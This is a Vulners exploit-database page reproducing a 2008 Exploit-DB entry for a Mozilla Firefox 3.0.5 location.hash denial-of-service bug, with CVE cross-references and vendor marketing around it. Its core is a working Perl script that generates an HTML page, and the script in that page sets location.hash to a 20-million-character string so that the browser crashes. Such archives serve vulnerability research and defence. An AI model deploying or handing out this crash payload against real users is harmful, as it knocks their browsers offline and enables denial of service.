Lucene search
+L

Mozilla Firefox 3.0.5 - location.hash Remote Crash

🗓️ 23 Dec 2008 00:00:00Reported by Jeremy BrownType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

Mozilla Firefox 3.0.5 location.hash Remote Crash exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-5715
23 Dec 200800:00
circl
Circl
CVE-2009-2953
23 Dec 200800:00
circl
CVE
CVE-2008-5715
24 Dec 200817:00
cve
CVE
CVE-2009-2953
24 Aug 200915:00
cve
Cvelist
CVE-2008-5715
24 Dec 200817:00
cvelist
Cvelist
CVE-2009-2953
24 Aug 200915:00
cvelist
EUVD
EUVD-2008-5686
7 Oct 202500:30
euvd
EUVD
EUVD-2009-2940
7 Oct 202500:30
euvd
NVD
CVE-2008-5715
24 Dec 200818:29
nvd
NVD
CVE-2009-2953
24 Aug 200915:30
nvd
Rows per page
#!/usr/bin/perl
# mzff_lhash_dos.pl
# Mozilla Firefox 3.0.5 location.hash Denial of Service Exploit
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# Crash on Vista, play with it on XP

$filename = $ARGV[0];
if(!defined($filename))
{

     print "Usage: $0 <filename.html>\n\n";

}

$head = "<html>" . "\n" . "<script type=\"text/javascript\">" . "\n";
$trig = "location.hash = \"" . "A" x 20000000 . "\";" . "\n";
$foot = "</script>" . "\n" . "</html>";

$data = $head . $trig . $foot;

     open(FILE, '>' . $filename);
     print FILE $data;
     close(FILE);

exit;

# milw0rm.com [2008-12-23]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jan 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.085
32